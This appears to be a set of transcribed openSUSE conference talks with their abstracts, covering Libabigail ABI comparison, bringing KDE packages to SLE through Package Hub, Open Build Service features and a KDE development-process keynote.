small set, well, small set, several hundred packages, of, you know, packages that are in the critical path, as they call it. And improvements that we need: so I've just ticked this here. I'm currently working on supporting the comparison of Linux kernels. This is well underway. The Linux kernel is huge, because we're not just comparing vmlinux; we're comparing the union of vmlinux and all the modules. There are a couple of those. And the Linux kernel has its own way of handling ELF. So it's quite interesting.
So we need more, you know, better support of C and C++ language constructs, mostly C++, you know, the new stuff, lambdas, blah, blah, blah. It keeps coming. It just needs work to keep up. Because basically it's like a compiler: you need to parse, there is a front end, which is the DWARF reader, which builds a middle-end representation, which is, you know, the Abigail model, and then, well, the back end is emitting reports. So people will come with better ABI change categorization requests, saying, ah, this change, you categorized it as harmless; please, can you put it in the harmful category? And we'll discuss and, you know, we'll see how we can do that. Some people want additional ABI change reports. You see, in the reports I showed you first, we show the changes, but we also show the impact, you know, which functions are impacted, or global variables. Some people just want to see the types that changed and don't care about the functions that were impacted, because there are so many types, you know. So it's a valid request. We have all the information to do that. We just need to emit other kinds of reports for that. Some people want more friendly web reporting. We need to work on that. And someone even came with a crazy idea of something web-based, anyway, you know, you submit two packages and the thing does its thing and shows you web reports, you know. So if someone wants to do that, it would be great. But I don't know, well, maybe I can try and learn some JavaScript. Anyway, so yeah, that's it for me, I guess. Now is the time for questions. I'm sorry, but I finished on time. Now you should do the same. You have two minutes. Anyone? What architectures does it support, only x86_64 or so? Well, right now it is known to work on x86, ARM, PowerPC, you know, and other stuff. The right answer is: if we have DWARF and ELF, it should work. PowerPC showed that there are some corner cases sometimes, but in theory it should work. Yeah. Another question: does it also catch calling convention changes? This is an interesting question. Right now, no, short answer. But I have a bugzilla open to support that. Not necessarily only calling convention changes, but things that are more subtle than that. For instance, the way the second parameter of a function is passed can change from one compiler to another. For instance, you have an LLVM-generated binary that passes that parameter on the stack, and GCC will pass it in registers, or the other way around, things like that. So the idea is to be sure that we have that information in DWARF. And if we have that, and I think we have part of it, then we can implement it on our side. Well, if, in C, the size of a structure changes, can you somehow detect from the library code whether it is ABI compatible or not? This is a problem when the function fills the whole structure, including the last member, and the size is in the public interface; then it could overwrite data. Okay. So if I understand the question correctly, it is: if the size changes, can we say whether that change is compatible or not? Right. Well, to answer that question, I would say that if that size change impacts another type that uses the type whose size changed, then it's ABI incompatible.
But then the impact is not necessarily only on other types. It can be on code too. You can have code that says sizeof of that structure. So my short answer would be: if the size changes, it's bad, period. If it's not bad, then you haven't looked closely enough. So yeah, because the question comes up over and over. For instance, if some code says sizeof, that sizeof is lost, because it's a constant and we don't see it in the generated code anymore. So I don't think we can really be sure that we're doing the complete impact analysis of these kinds of things. And I think we would err on the safe side by saying that this is bad, period. If you do it, you know that it's potentially bad. Yeah. It's bad. You mentioned that you were looking for ways to identify whether two certain structs are the same in C, which doesn't have the ODR. Have you thought about building, like, an MD5 sum of a struct and then comparing that? Oh, well, to us, the problem is solved. I mean, well, it's solved. The question is interesting. To build an MD5 sum, or any sum, you need to walk the structure, right? What I want to avoid is to walk the structure. Exactly. And that is what we do. That's what I meant by saying that we try to transform the problem from an exponential one to a linear one; this is basically the kind of technique we use. We use some kind of hashing to avoid walking over and over. We just walk once per type, name and kind. Yes. It's just that the hash that we end up using is not... we don't save it. It's just in memory. So I guess, thank you very much.
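To illustrate the sizeof point from the questions above: once compiled, a sizeof is folded into a constant, so the binary keeps no link back to the type it came from, which is why the safe answer is to treat any size change as suspect. A small hypothetical example:

```cpp
#include <cstdlib>

// The layout of this struct is part of the ABI of every interface using it.
struct blob {
  int a;
  int b;
};

// sizeof(blob) is a compile-time constant (8 on typical targets), so the
// generated code effectively calls malloc(8); the connection to 'blob' is
// gone from the binary, and no binary-level analysis can prove that this
// allocation is affected when blob grows in a later release.
void* make_blob() {
  return std::malloc(sizeof(blob));
}
```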
Libabigail is an infrastructure for semantic analysis of ELF binaries containing C or C++ programs. It powers command line tools like 'abidiff', which let users compare ABI changes between two different versions of a given ELF binary by analyzing just the binary and its ancillary debug information. The result of the binary comparison is a kind of hierarchical 'diff' which shows changes down to the types of the interfaces that constitute the ABI of an ELF program. This infrastructure allows software distributors (among other actors) to build specific tooling to review and analyze ABI changes that might occur whenever a shared library package is updated. That tooling might even be tailored to automatically prevent packages with unwanted incompatible ABI changes from reaching users. This talk intends to present Libabigail, its architecture, its capabilities, its current limits, its associated tools and how it might be used to further build highly tailored ABI verification tooling. The talk will also explore the potential improvement paths that are currently identified and, based on feedback from the audience, explore improvement paths that are not yet identified.
10.5446/54473 (DOI)
So, let's start. I'm going to talk to you about the KDE packages for SLE that we have done for Package Hub. I suppose that you have been to the other Package Hub talks that have been at the conference. But this time, I'm going to talk only about the KDE packages and about the whole process to get the KDE packages into Package Hub. So that might be a starting point for you if you want to also collaborate with Package Hub and submit your applications there. It might be an interesting talk for you. So, let's start by explaining who I am, because I suppose that most of you don't know me. At least I don't know most of you. So, I'm antlarr on IRC, Antonio Larrosa in the real world. I've been a KDE developer for 20 years. I've been a SUSE user since '98, something like that. At that time, SUSE sent DVDs to all KDE developers, so I started using it at that time. I've been a SLE user since around 2004. In the previous company I worked for before coming to SUSE, I used SLE as a maintainer, as a system administrator, and also developed applications for SLE. And I've been a SUSE developer: I've been working at SUSE for the last four years, and also for a bit longer than a year around the year 2000. And currently, I'm on the SLE desktop team. So, I work most of the time with GTK applications, but also with KDE applications on openSUSE. So, how did this project of making KDE packages for SLE begin? Mainly, it started as a Hack Week project. I suppose that most of you who have taken part in a Hack Week have also had it happen that on the first day of Hack Week, you still don't know what to do. And then, talking with some people, they suggested that maybe it would be a good idea to make KDE packages for SLE. And I thought, let's see, there are KDE packages for openSUSE, so it shouldn't be much of a problem. I was wrong, okay? That's a spoiler for the talk. It started in Hack Week 12, to be more precise. If you check the dates, and I had to check it, that's around April 2015. So, it's been a while now since I started working on this. But most of the work was actually done by the end of 2015 and the beginning of 2016. Okay? I worked obviously during the Hack Week, but I was overwhelmed. There was a lot of work to be done, and it was clear that it was not a project to be done in a week after I started. So, in a sense, this project has been kind of a guinea pig for Package Hub, because we have been testing things before Package Hub was released. And I suppose it's not wrong to say something like that, okay? So before beginning to talk about how this was done, I should probably talk about how KDE is structured in OBS. I guess most of you already know, maybe, so I will probably go faster on this. Basically, we have several projects for Qt packages. The main project for that is KDE Qt 5, which is the devel project for Qt in Factory. And then we also have Qt 5.6, Qt 5.7, and, you know, the progression, right? You see the pattern there. Then we also have the KDE projects. We have split that into Frameworks 5. There's a project, KDE Frameworks 5, which right now includes Frameworks and Plasma packages mixed together. Also, we have KDE Frameworks 5 LTS, which is the LTS version of Plasma. And it includes a newer version of Frameworks, but not as new as in KDE Frameworks 5. Personally, I think that we should also split that, but probably that will happen in the next weeks or months. But right now, Frameworks and Plasma are in the same project.
And then we have KDE Applications, which is basically the KDE applications, as the name says, the software, the applications for KDE. Then there's also KDE Extra, which is more applications for KDE that are not part of the KDE Applications software compilation. And then we also have kind of an obsolete project, which is KDE Distro Factory, which includes KDE 4 packages, which are still in use. And with a little luck, we will stop using that as soon as possible. Then we also have other projects in OBS for KDE, which are the unstable projects, which have the services to get the packages from Git directly. These are, as you see, the same areas: Qt, Frameworks, Applications, and Extra. And they are updated mostly every day, sometimes even more than once per day. So these are the base for Krypton and Argon; those distributions take their packages from these projects. So with so many projects to base our SLE packages on, which should we take? Well, basically, at the beginning, I decided to go with KDE 5.4.3, I think. But then when openSUSE was released, sorry, not when it was released, but when openSUSE was updated, I changed it and used KDE 5.5.5. Basically, I used the devel projects for Factory, which soon, well, not too soon, but eventually I realized was kind of a bad decision. And when I was making the packages for SP2, for SLE 12 SP2, I decided to just use the packages from Leap, from Leap 42.2, directly. Because a lot of time had been invested in the 42.2 KDE packages, and it would be a pity not to use them. So basically, at the beginning, I used these projects as a base. And if we count the packages that are in each of these projects, we see that there are quite a few packages in each of them. And if we sum them, we see that there are nearly 1,000 packages there. Of course, not all of them are currently in Package Hub. There are many packages that either don't make sense on SLE, like, for example, Discover or some of those app store applications that use newer PackageKit dependencies, and SLE users usually don't want to use app stores anyway. There are also not-so-common applications that don't make sense on enterprise. Also games, for example; I included a few games just in case. And in the end, we put into Package Hub something like 350 to 400 packages. So we already knew what to base our project on, and then I started building everything, and the first problems arose. For some of the libraries that we were using, OBS couldn't resolve the dependencies. I mean, I had a project in which I built, let's say, Qt 5, Qt 5 Base. And then when I was going to build another application or another library that depended on that, OBS simply said that the dependency was unresolved. And it was in the same project, and this was, what the fuck? It was kind of a strange situation. Well, it turns out that KDE uses dependencies on capabilities instead of using package names. Not all of them, but in many cases, it uses dependencies like that. And RPM in SLE wasn't creating the provides for those libraries. So the solution was simple once the problem was known: just including the CMake RPM macros file from Factory into the CMake package in SLE, and it was solved, and we had all the capabilities included in the packages. So then we had a problem with packages missing in SLE 12.
There were many packages that were simply missing there, and then there were other packages that were too old. Maybe I should say too stable, because they were not updated with respect to Factory, of course, but in any case, I needed newer things and I needed things that weren't there. So I learned about BSK the hard way, because honestly, I didn't even know that was a thing. It turns out that packages that are in SLE are sometimes used to build other packages but are not included in the distribution. So that was what was happening there. And fortunately, I got in touch with Adrian Schröter, with Leonardo Chiquitto, and other developers who helped me and moved the packages to OBS so that I could use them there. So afterwards, well, this I think has already been explained in other talks: rpmlint complained that many packages that I was building interfered with other packages that were already in SLE. I mean, even if it was only interfering with one package that was used to build other packages but was not released, it didn't matter; I couldn't build that package, rpmlint complained and the building of the package stopped. As a result, I couldn't build new versions of Qt, of course. You have to remember that in SLE 12 you get Qt 5.3.1, and even in SP1 you get 5.3.2, which is a very old Qt version. But fortunately, Max, I don't know if you are here, Max Lin, backported a lot of patches from upstream into Qt. He really did a great job, and those versions were good enough for us. But there were also other packages like CMake, which was very old; kdelibs4 was included, I mean, it's not in the distribution but it's in BSK; libkipi, FFmpeg, Mesa, LLVM, there were old versions of those, and something had to be done. So, as I said, no package in Package Hub can have the same name or include a file that is already included in any package in SLE. So that might look like a problem for us if we want to create a package, but it actually makes sense for users, and we have to think of users. So we have to find a solution that works for us. So the main solution for this is to patch the package in SLE and backport any feature that we need from the newer version, okay? To backport things, I should have said that. Sorry. So sometimes, also, it's possible to force rpmlint to ignore the error and whitelist the package so that the build can continue. Of course, this is not a long-term solution. This is only a way to continue building and continue working while the real problem is fixed, okay? This was done because if I had had to stop for every package that had this problem, then I would still be building KDE packages. This way, I could continue working on other packages while someone else was fixing these. So another problem was the Wayland problem. It turns out KDE at that time required Wayland 1.3, but SLE 12 only had 1.2. So probably you are wondering now, wait, does SLE use Wayland? The answer is, of course, no. Okay, but it was used to build other packages, as I said before. So the solution in this case was to patch Wayland and include quite a few patches from upstream. And yeah, it got there and it built fine, so I could continue. Also, another problem that I had was with Akonadi. I am showing you here a small selection of the problems that we had, but there were many more.
But in this case, for example, Akonadi had a special requirement for SQLite 3, which was support for the unlock-notify interface, which can only be enabled at compile time. So the solution was easy to do, but it was another change that we had to make in SLE in order to support this. Then Python SIP. Python SIP as included in SLE 12, which was version 4.15.4, wasn't enough, and in order to build the Python Qt 5 bindings, we needed some features from newer releases. Those were the sort of features that we needed, and basically I just had to backport all of them. Fortunately, Python SIP is not used much on SLE; it was mainly used only to build the Qt 4 bindings. And the Qt 4 bindings are only used by two packages in SLE, ffado-mixer and hplip. So I tested those packages, saw that they worked fine, and we could go on. So we reached a point at which Leap 42.2 was released. And, sorry, it included Plasma, I think, 5.4 something, and in a maintenance update it was upgraded to 5.5.5. We hadn't released anything yet for Package Hub, so I thought, let's upgrade. Why not? Many problems are already fixed there; it should be quite a bit more straightforward, right? The problem was that this update brought new dependencies. And, for example, the Wayland problem returned. This time KDE required Wayland 1.7, which is a long way from 1.2, which was the one still provided by SLE. So, well, did SLE SP1 include Wayland? No, of course it didn't. But the solution was to backport even more patches from upstream. In the end, I think I got something like twenty-something patches from upstream in order to build everything. So it was quite a lot of work. By the way, in case you're wondering why KDE needs Wayland if KDE still doesn't use Wayland even in Leap or in Factory, the thing is that there is a dependency in KWin on some Wayland libraries that it uses internally to work, even on X11. So the Wayland libraries have to be there. Another problem was the SLE branding packages, because, as you know, SLE has a different branding from openSUSE. So I couldn't just use the Plasma 5 openSUSE branding packages, and what I did was to create new Plasma 5 SLE branding packages, which were, of course, based on the openSUSE ones. But I changed the backgrounds to the standard SLE backgrounds, I changed the splash screens to include more SUSE logos, and these kinds of things. So basically we reached a point at which we could test some things. Okay. And we found out that there were missing binaries. I mean, everything built fine, all the dependencies were there when building, but when a user wanted to install the packages, there were some dependencies that weren't available to him, because he's not using OBS, of course. So there were packages in OBS that were not available to users. For example, here is a small list of them. As you see, it's not only Qt 5 packages, the Qt 5 modules, but also GLU, also LMDB, also FLAC, even, and some other libraries. In some cases, some of those libraries were available for SLE Desktop but not for SLE Server. In other cases, some of those packages were available for SLE Server but not for SLE Desktop. In other cases, they were not available for either of them. And well, it had to be worked on, which also took time. So the KDE packages finally arrived for SP1 after more than a year, in July last year. And I thought, okay, this time SP2 won't catch me off guard, and I will be prepared.
So together with Max, we upgraded Qt in SP2 to the LTS version, to 5.6.1, which is a nice upgrade. And it also allowed us to remove many patches that had been backported and just use the LTS version, which is easier to maintain. So that's very nice. Also, to get rid of the Wayland problem, I said, okay, let's upgrade Wayland to 1.11, and that will solve everything; at least the Wayland problem, not everything. Something I didn't do, but it was nice that someone else did, I don't know if you are here, thank you, is that someone else upgraded CMake to 3.5.2. That also helped a lot, because there were many packages in KDE which required a newer version of CMake. In some cases, there was a silly dependency, and if we removed it, it basically worked; there was nothing else to be done, just remove the dependency. But in other cases, it was really required. So, as I said, it wouldn't catch me off guard, but it actually did. Because I didn't think at that time about the problem of internal API usage in some KDE applications. Some KDE applications and libraries use internal API from Qt because they need to. This means that those KDE applications, like, importantly, KWin, the window manager, or Plasma, just require a specific version of Qt. You cannot upgrade Qt without rebuilding and reinstalling those KDE applications. So that was a problem, because there were many users using SLE 12 SP1 with the KDE packages, and when they upgraded to SP2, those basically stopped working. Also, the KDE look changed quite a bit. Many configuration files changed places, they changed format, and the QML files that define the look also changed a lot. This means that the openSUSE branding changed, and I was basically using a script to change the branding from openSUSE to SLE, and this script stopped working, so that meant a lot of work had to be done as well. And this time, as I said, most of the dependency problems were already solved, actually, in SP2. Okay, thanks. So, just using the Leap 42.2 packages, as I said before, was much nicer. So this means that in the SP2 change we upgraded Frameworks, we upgraded Plasma, and even during the SP2 maintenance I upgraded to 5.8.6. We upgraded some applications. So, can you use Plasma in SLE? I'm going faster because I've been told that my time is running out. Okay. So, don't ask, just use it. Okay, just do it. The only thing you have to do is register your SLE system, enable the Package Hub extension and the SDK. Actually, I'm not sure if the SDK is actually needed, but it doesn't matter if you enable it. And then do a zypper install of the KDE pattern. Okay, only that. It will install a whole KDE desktop on your SLE system, which means installing around 450 new packages and around 300 megabytes. Okay. It's quite a few packages, but it's worth it. So, after you install it, if you get this GDM screen, then you have to click the gear button next to Sign In, and a popup appears where you select Plasma; then you log in and, if it works, of course, you get into your Plasma desktop, which, as you see, is very similar to the GNOME desktop in SLE, because I tried to make it as similar as possible. Will SDDM work? In fact, I talked with Scott a few days ago about that, because I thought it didn't, but actually it does. Sorry, it does. I tried it these days in a virtual machine, for SLE Desktop and for SLE Server, and actually it works quite well.
As you see, basically it's the same GDM theming, the same GDM look. You only have to edit /etc/sysconfig/displaymanager and change the display manager from gdm to sddm, and as you see, the look is very similar. The only known issue is that the shutdown button just logs you out of your session. So, the solution is easy: just do an extra click in your display manager and shut down the system from there. So, there are already KDE packages in Package Hub; just use them. And this is not only a KDE thing: there are many dependencies that were included in Package Hub thanks to this. So, I think, and I hope at least, that many other projects will get into Package Hub more easily thanks to this. And I would like to thank all these people for helping to get the packages into Package Hub. So, I don't know if we have time for questions. No. Okay. So, thank you.
Submitting more than 400 new packages to Backports. This talk will explain how the KDE packages were prepared and submitted to Package Hub so SLE users could enjoy them. Missing dependencies, rpmlint complaining about valid packages, not fully available dependencies, missing branding packages... It wasn't an easy path to travel but it was worth it. This talk will explain the problems found and how they were solved with the hope to make it easier for others to submit their packages to Package Hub.
10.5446/54475 (DOI)
My name is Björn Geuken. I'm working in the Build Service team as a Rails web developer. And yeah, I will talk about the Build Service and some of its features, and try to shed some light on some of the more hidden parts that probably not everyone knows about. So the Build Service builds packages. We have 47,000 users, which doesn't sound like that much, but if you consider that it's not something a normal person would do, packaging is not exactly a common hobby, it's actually quite a lot. And yeah, we build 200,000 packages each week only for home projects, so only for users, and probably many more additional packages for our distribution and for other projects like GNOME and so on. And yeah, OBS is also used by a lot of other communities, projects and companies, hosted by themselves for whatever reason, security and so on. So I said you can build packages. That is one of the cool features, for all kinds of architectures. And yeah, you can build them against different distributions so that they run there with the same libraries and so on. And yeah, we have all kinds of package formats, Debian, RPM, you can build images and so on. So that's probably one of the reasons why it's used by so many different people. And obviously there's more. We also make it relatively easy to connect packages with users. You package stuff and then you have your repository, others can use it. We have a request and review system, which we will see a bit more about later, a notification system. And yeah, there's a bigger ecosystem around OBS; there's the osc tool, which covers a lot, in some cases even more than the web UI can do. And, for example, there's also the services system that you can use. So I did a quick search on GitHub and around 20 services exist right now. And yeah, you can write your own, you can submit it to us. So there are existing ones, like set_version, which sets the version in the spec file, or tarring or recompressing your archive. And there's one thing which I will present now, and that's GitHub or Git integration. And yeah, this is how it looks. So I will... mouse... okay. And yeah, what you need is: you define the service, that's here, then the URL of the Git repository. And then basically you are already there and have this, but of course it's a bit tedious to write this whole XML by yourself. So what you can also do is go to the UI, click on remote URL, and then you copy some Git repository URL, obviously it doesn't have to be Git, and yeah, you copy it here. And then save. And you have your file. Yes, then the service will run and create your cpio archive. It will take some time. There it is. So you spare yourself the time of creating this XML, which is quite nice. And if you want, you can even take it one step further and integrate this by adding a service for GitHub. Let's click here on settings, integrations and services. This will make GitHub always trigger the Build Service, notify it whenever there is a change, a new commit. So that would be like here. You click here. And the whole instruction is written here, which is quite nice. So I will just briefly mention the most important parts: you need a token that you create. You can do it with osc token; you can create it in general or as a specific token only for a project and package. And then you activate it.
And that's how you can continuously get new packages whenever there is a change in your GitHub project or Git project, which I think is quite cool. And additionally, you can also set a branch, for example, with the revision parameter. And there's even more: you can extract your spec file if you track it in your GitHub repository, or if you want to use someone else's stuff and they have that, then you basically don't have to do anything. It will just build continuously, and all you have to do is add this URL in the OBS UI and click save. Then, package branching is probably something everyone knows, or most of you. So you can benefit from other people who already built a package. Then you have this link, which basically refers to it, and there's a _link file which looks like this. This means that whenever this upstream package changes, your linked package will change. So if your own packages that you built require this package, and this package changes, they will rebuild. If you want to prevent this, you can lock it by setting the link revision. That is the command osc setlinkrev, and then you have here the reference to the revision that you actually want to link against. So that's how you lock it. And in addition, you also have... so once you have locked it like here, that's one of our packages, that's our project, one of the packages we need, we linked it, we also set the reference, and apparently the other package changed. So that's how you see it. If you click here, then you see the diff. So you also have an easy way to see what changed and when it changed, and then you can consider whether you want to update the link reference. And yeah, so I think that's pretty nice. And apparently, if you start linking packages that you need, you stack up packages in your project, and yeah, you have a lot of stuff that you have to maintain. So in our case, it's quite a lot. That's just a snippet. And we have a monitor page, that's what you see right now, which gives you a nice overview. It's actually the same page, the same project, but it looks a bit different because I didn't filter it. So you can set here the different repositories and architectures you want to filter against. And then you click here, which, that's a button, so you wouldn't notice, but then it will filter it. So you get a smaller... like, I just want to have a certain group of packages, do it like this and then, all right, that's a diff. So let's say RubyGems. And that's how... RubyGems. Okay, and then you have an overview. From there, you can of course also look at the different failures. If something is unresolvable, you get a popup which shows you that, and yeah, if you click on the packages, you could end up here. And you see your failures. You don't really know much about them; you could look into the build log to see the actual error message. If you want to see the history of this package, what changed, when and why, you can see it here in the job history for the particular repository and architecture. So you see here the revisions, and you have the reasons why something changed. "Source change" means that the package itself changed. "Meta" would mean a package it depends on changed, or the project config. And "new build" is, in this case, no, no, it's not the first time, but either because it's the first time you create this package and it got built, or because you triggered it manually. And so it can happen that you look at this and you see, you know, it fails. You can look down and see in which revisions.
So maybe it fails for a longer time, and then you check the revision. You go to the revisions tab... wait a bit... and a bit more... and that tab will, in some seconds, show you a list of all the revisions, the changes that have been made, and, yeah, like that, who did the change. And if you know, let's say, that revision six broke it, we could either browse the source, which, yeah... well, with the connection here we would just see the images; I could have made a video, but that's also a bit tedious. Yeah. So then you can click on the revision and see the file changes. So you have again this diff, and you can look through it and get an idea of what changed. So you might even get an idea of what in particular caused the failure, like adding a patch or removing it or updating to a new version. And yeah, so this is also a nice thing to do. And then, that's based on rdiff. So that's what I just showed you here. And rdiff is like you see it here, the diffing of different packages and revisions and so on. And this can be used in many ways. Like we saw before, if you have a link, you can diff against that; it's actually the same view. If you search for something, like, hey, I need InfluxDB, you search for it and you get a list, but which one? What's the difference here? So I could just go to the first one, go to this diffing page, either by clicking through the UI, I already did it, but you can also go directly there. And then you want to diff against a different project. So apparently I also prepared that, but let's say Newton, and then you add another parameter. That's a bit ugly, I don't know why we don't make this easier. And then you say, like, oproject, which probably stands for "other project". You press enter and then you see, okay, this is just another commit; it's not so much different. It's not like a version change of the upstream package, but yeah, some adjustments in the spec file. And actually there's also a README entry. So this is missing in the server:database version, but it's here. So maybe I'd rather want this one. And of course, like we saw before, you can also set the revision, so you diff against a different revision. You could even diff different packages, which is maybe not so useful, unless you want to diff MariaDB against MySQL directly after the fork. Yeah, then we have quite some collaboration tools. And actually what we saw is also partly collaboration related, but something more in-depth for collaboration could be that you use the status tab, which... it's nicer to show it here because you see how you get there. So we have our project status monitor page, but we can also go here, to advanced, to the status tab. And then we see such an overview there. And apparently, yeah, you see here the different packages that currently fail in this project. You have here links to the build logs and how long they have been failing. Apparently, we don't update it so often, at least these packages; the rest is building fine. And you see here some text, which was written by someone. And the way you write this is to open this and then you enter some comments. So maybe your colleague already worked on this and you take over, and then you already know what you're looking at. Like, if you really need this package, and you didn't have the time or the chance to talk with him, maybe because you're in a different time zone or you didn't know before that you would need it, you can note what you figured out and so on.
And then, yeah, someone else can continue from there and save some time on debugging. And in this particular case, there's even a link, which was not added by someone else, it's some OBS magic; it's even written here, "link package is different". So then you can click here, get an idea, and you are again on this diff page, and yeah, you can compare it and try to make sense out of it. Another thing to collaborate with is requests. OBS has a request system. You can create requests for changes you made, like changes to the sources; you can request to become a maintainer of something, or that a project or package gets deleted, for whatever reason you might want that. Which is also quite powerful. So let's just go to my page. So probably some of you already know this. Here you get an overview if you are a maintainer of some project. You also see reviews. So if a user thinks that you can maybe help with something, that you know more about this package than he does, he can request that you have a look and tell him whether it seems to be good or not. While preparing this, I actually found some issue, so I created one of those. So I did some changes here, like here. And then I think this is good enough to submit, so I click here to submit the package. This will go to the one I branched from initially, and I can click OK. It's written here that this got created. Here is the overview, and, as I said, we have a review system. So if I think someone else should have a look at this, someone in particular, then I can add him, or add a group, and he will get a notification. And then later on, the maintainers of this project can accept the request. And I said notifications. So that's another nice thing in OBS: you have a notification system. If you click on your user page, you can select this notifications tab and subscribe yourself to the different notifications that you might want to receive, in this case, maybe a review. So if someone wants a review, you would get a mail. And I think that also helps a lot. Because it can be a bit too many mails when someone creates a lot of requests, but yeah, it's another nice thing. And that helps with packaging stuff and working with different people. And that would be it. Do you have any questions? Any other hidden features you might want mentioned that I missed? Okay, then thank you for being here and see you soon.
OBS provides a wide range of features that help packagers ship their software to their users. This talk shows some of the key features of OBS and how they help packagers make their lives easier. For example, did you know that you can set up OBS to fetch package sources directly from GitHub and build them? OBS is a Rails-based web application, with a Perl backend, that allows users to build and distribute packages for a wide range of distributions, like SUSE, Fedora, Debian, Ubuntu and Arch Linux.
10.5446/54476 (DOI)
I'm pleased that we have our keynote speaker here from KDE. And Aleix Pol is going to talk about KDE and its development process, so please welcome him. Well, good morning. I know it's not easy to wake up on a Sunday morning, especially to come listen to this guy, so I really appreciate you coming here. So, well, back in March or something, Douglas told me about doing a presentation here. openSUSE has always been an interesting project that has been orbiting me, and KDE, for a long time. And well, I'm really pleased to be here and, well, to have been here, talking and listening to you guys, and, well, explaining my little piece of the story. So, for those who don't know me, my name is Aleix. It can be expanded, but you can call me Aleix. I've been on the KDE board for three years now. Professionally I work for Blue Systems, where I work full-time developing different KDE technologies. And, well, I used to work mostly on KDevelop and the KDE Edu applications. And when I was hired to do Blue Systems stuff, I started doing more Plasma things, and I started maintaining Discover, which is our software center, for those who don't know. And I come from Barcelona, which is a nice city by the Mediterranean, where we're running a meetup group called Barcelona Free Software, which is sponsored by openSUSE. And I thank you for that; it's really, really nice for us to have you as sponsors. And, well, it's pretty cool. So if you are ever in Barcelona and want to talk about free software, we might be having a presentation one of these days; just pop by and see what's what. You can always ask us. And in the worst case, we can go for a beer. So, like I was saying, Douglas told me, let's talk about KDE. And one of the things that I've been doing through my whole involvement in KDE is thinking about the development process, sometimes with my KDevelop hat on. You're making an IDE: what do you give to the user so that they can develop things, or develop KDE further? KDevelop, by its vision, is not something that should be only for KDE projects. But on the other hand, we understand that many KDE developers are using KDevelop as an IDE, so you might just as well want to have things integrated properly. On the other hand, I've been a maintainer of different projects for several years, and I've been thinking about how to deliver good applications on different platforms. For example, one of my involvements, like I said, was KDE Edu; that means KAlgebra for me, which is a tiny application, a math application I worked on when I was a student back then. And actually, for the last five years, I haven't developed the application itself that much, but I've been porting it to Android. Actually, I started by porting it to the Nokia N900, then the N9, with all of the changes that all of these meant. But in general, being able to keep in mind the use case of a person who is carrying a computer in his pocket is kind of interesting, I think. On the other hand, with my involvement in Plasma, we've been thinking about, well, how you get somebody to spend his or her free time working on something as sensitive as a shell, or tools that are kind of part of the operating system, depending on what your definition of an operating system is. So, to get the question out of the way: how do we get things done? Well, we basically have developers, which basically means coders, designers, translators. We need to get together to work together and, well, do things. And when I say do things, I mean that, right?
Because we have very different products. In KDE, we started out being a desktop, but nowadays we have, well, we have a desktop, which now we call Plasma. But we are also doing different things. And well, we need to accommodate all of those, because they are all very important. You need to be able to offer a solution for the people who want to use Linux and who want to be efficient when they have Linux, a free software alternative for when they work. But then to actually get things done, they will want to have applications, right? I mean, being able to start applications is not everything you need to do with your system. You need to, well, manage your files. You need to, well, have a text editor. You need to have, well, many other things. And we're also developing these. Possibly one of the things that makes KDE special there is that we don't really think our applications are something that should only ever be used on the Plasma desktop; it's something that will always integrate properly with Plasma, but it's not necessarily a requirement, right? Most of our applications will work on any Linux desktop environment, but they will also work on Windows or OS X or even Android, right? And we also create frameworks, which, well, normally are byproducts of our applications and desktop environment, but they can also be something that third parties can use and leverage, and we're really happy to know they're doing so. So we're working on all of these products, but how do we deliver them? Well, currently we're delivering in tarballs, which is something a bit weird, but, well, we've been doing it for the last 20 years, and it kind of works, right? But in general, it helps us get things to the users, because, well, we have some users, and actually any KDE developer, if you ask him who he is doing his software for, is, well, doing it for the user. So we like to think about them. But it's not actually true that we have users. Actually, you have users; you're the ones getting the KDE software to them, you and others, right? And actually one of the things that I would like to discuss, well, not today, but in general in the next months, is how we can solve a bit of this kind of difference. It's looking a bit tiny, so you maybe don't get to see it very well. But the idea is that, well, you know that graph very well. We're delivering things, so we are giving you tarballs and you're getting these tarballs to the user. There's some kind of feedback that should get to the developer, and we need to make sure that it gets there. I don't know if you think that the whole process is working properly. I think that there are possibly things we can do to improve it. But, well, it's something that we can definitely discuss and make sure that we're actually doing the best thing possible. Because in general one of the big things that has been important for free software has been its agility in reaching back to the user and integrating feedback. It's something that we need to make sure we keep tight. Beyond the whole how we get things done, I would also like to go a bit through the kind of things that we're thinking about when a developer sits in front of his computer, what kind of things he's thinking about. So I will say a list of things and I hope it makes sense to you. While we've been working on desktops for 20 years — we as in KDE, not me personally, I was very young when it all started. Not that young. But, well, everything is still changing.
A bit like the keynote speaker from yesterday pointed out, it's not like everything is changing per se. It's more like we're adding things to the pie; we're getting, well, different use cases. But I think that what any developer thinks about is not how well he's doing with the things he has, but, well, what things he should be doing better. So, well, first thing: we were used to having a computer, and the definition of a computer used to be something that has a mouse and a keyboard, right, and a screen. And actually mouse and keyboard was something that was quite defining for the whole desktop experience. But, well, that's not true anymore. You will most often have these, and then sometimes you have touch, and not always. Like, you can have some systems that won't have a mouse, most definitely, and different kinds of keyboards, sometimes keyboards that are actually on the screen, which is like a bit of a bridge between the two worlds. Well, it's something that somebody thinking about how people are going to be using a computer needs to think about. They're also not always even sitting when using a computer, which is also quite interesting when you think about the big trends of the last 10 years: first, there was the phone, which was actually the whole opposite of the desktop computer. And then everything that has happened since then has been quite an in-between, with the exception of watches, and actually watches, I don't think they have been all that successful. And in any case, nobody is really efficient on their watch, I would say. So it's maybe kind of out of our scope. But in general, there's a spectrum. There aren't really just different kinds of devices. And, well, it's something we're thinking about, and it's most definitely somewhere for free software to shoot for, where we could be doing much better work. And similarly to input devices, screens have changed completely. We used to have more or less the same screen, a bit bigger, a bit smaller, but not even that much, right? But now we have very different form factors. We have these tiny, well, three, four, five-inch screens, and we have setups with big screens and actually many of them, and that's actually quite common. And many densities: if you've bought a computer in the last two years, maybe you decided against it, but most laptops on the market today will have different densities, which means that you need to make sure that all of the applications will integrate properly with your hardware. And well, it's something that we have worked on, and we could possibly be doing a better job, but I think, well, we're quite there, to some extent. I'm sure many of you also have problems with this, so feedback is welcome. Another thing that has massively changed is, well, the kind of processors that people are using. We used to have x86 on all of the devices, and well, the smart people in the crowd will also tell me that we still have x86 on all of our devices. But interestingly, we've seen that whatever used to be x86 is still kind of always x86, and then we've all gotten these kinds of devices, all of us, and all of these are not x86, but they are ARM, right? In the C++ and C world this is something that shouldn't matter at all, right? You should just be using the right compiler. Problem should be solved. But in the end, I'm pretty sure this has been one of the things that have stopped us from actually properly flourishing on these other platforms, right?
